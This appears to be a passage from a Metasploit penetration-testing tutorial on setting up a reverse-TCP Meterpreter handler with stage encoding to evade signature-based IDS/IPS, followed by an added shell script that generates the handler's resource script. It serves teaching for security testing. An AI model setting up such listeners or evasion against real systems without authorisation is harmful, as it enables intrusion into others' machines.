Hands-On Web Penetration Testing with Metasploit

Setting up payload handling in MSF

Before launching the module, we need to set up the handler. The handler, exploit/multi/handler, is a stub exploit module with no exploit code of its own: it only starts the listener for the selected payload, so it is used to catch connections from payloads that were delivered by some means outside the Metasploit Framework, such as a standalone executable generated separately and run on the target:

  1. The handler module is loaded by typing the use exploit/multi/handler command:

  2. Next, we view the available options using the show options command, as shown in the following screenshot:

As we can see, the payload-specific options are empty at this point; they are loaded once we select a payload. For this example, we will use the windows/x64/meterpreter/reverse_tcp payload and set its standard options, LHOST and LPORT. Two further options, EnableStageEncoding and StageEncoder, are listed under show advanced rather than show options; they control the encoding of the second stage (the Meterpreter stage) that the handler sends to the victim once the stager connects back:

First, we set LHOST and LPORT and then choose the encoder. The book uses shikata_ga_nai (x86/shikata_ga_nai) here; note that this is an x86 encoder, so for the x64 stage of a windows/x64 payload an x64 encoder such as x64/xor_dynamic must be selected instead, because the decoder stub runs inside the target process and has to match its architecture. The reason for encoding the stage is to bypass signature-based IDS/IPS: the stage is re-encoded on each delivery, so its bytes on the wire differ from the well-known Meterpreter stage signature. This does not hide the stager itself or the connection back to the handler.

We also need to enable stage encoding by setting EnableStageEncoding to true; this switches on the second-stage encoding process with the encoder we selected in StageEncoder. Once these options have been set, the run -j command is executed to start the handler as a background job, so the console stays free while the handler waits for a connection (jobs lists the running handlers).

Another way to run the handler is by using the handler command, which is available in the console and creates the same multi/handler job from command-line arguments instead of a series of set commands:

Hence, the one-liner that executes the handler with all the previously discussed settings is handler -H <IP> -P <Port> -e <encoder> -p <payload>, as shown in the following screenshot. Here -H and -P supply LHOST and LPORT, -p selects the payload, and -e selects the stage encoder and enables stage encoding; handler -h lists the remaining flags.
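The steps above are normally typed interactively, but the same handler can be set up reproducibly from a resource script. The following helper, added here as an example and not part of Metasploit or of the book, generates that resource script and refuses an encoder whose architecture does not match the payload's stage, which is the mistake an x86/shikata_ga_nai default invites with a windows/x64 payload. The architecture check is a naming heuristic (an x64 path component means x64, anything else is treated as x86) that covers only the Windows x86/x64 modules discussed here; the address 192.0.2.10, the choice of x64/xor_dynamic, and ExitOnSession false (to keep the handler alive for more than one session) are this example's assumptions, not values from the page.

```shell
#!/bin/sh
# Added example: build an msfconsole resource script for exploit/multi/handler
# with stage encoding enabled. Not part of Metasploit itself.

# Architecture implied by a Metasploit module path. Assumption: only the Windows
# x86/x64 payloads and encoders from this section are in scope, so anything
# without an "x64" path component is treated as x86.
module_arch() {
    case "$1" in
        */x64/*|x64/*) echo x64 ;;
        *)             echo x86 ;;
    esac
}

# The stage encoder's decoder stub runs inside the target process, so it must
# be built for the same architecture as the payload's stage.
# Returns 0 when the architectures match, 1 otherwise.
check_encoder_arch() {
    [ "$(module_arch "$1")" = "$(module_arch "$2")" ]
}

# Emit the resource-script body for the handler described on this page:
# payload, LHOST/LPORT, stage encoding, and a background job (exploit -j).
# Usage: gen_handler_rc LHOST LPORT PAYLOAD ENCODER > handler.rc
gen_handler_rc() {
    lhost=$1; lport=$2; payload=$3; encoder=$4
    check_encoder_arch "$payload" "$encoder" || {
        echo "encoder $encoder does not match the $(module_arch "$payload") stage of $payload" >&2
        return 1
    }
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set EnableStageEncoding true
set StageEncoder $encoder
set ExitOnSession false
exploit -j
EOF
}

# Example invocation (192.0.2.10 is a documentation address, chosen for this
# example). The generated file is then run with: msfconsole -qr handler.rc
gen_handler_rc 192.0.2.10 4444 windows/x64/meterpreter/reverse_tcp x64/xor_dynamic
```

Passing x86/shikata_ga_nai with the x64 payload makes gen_handler_rc print a mismatch message and return 1 before msfconsole is ever started; with a windows/meterpreter/reverse_tcp (x86) payload the same encoder is accepted.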

Next, we will look at MSF payload generation.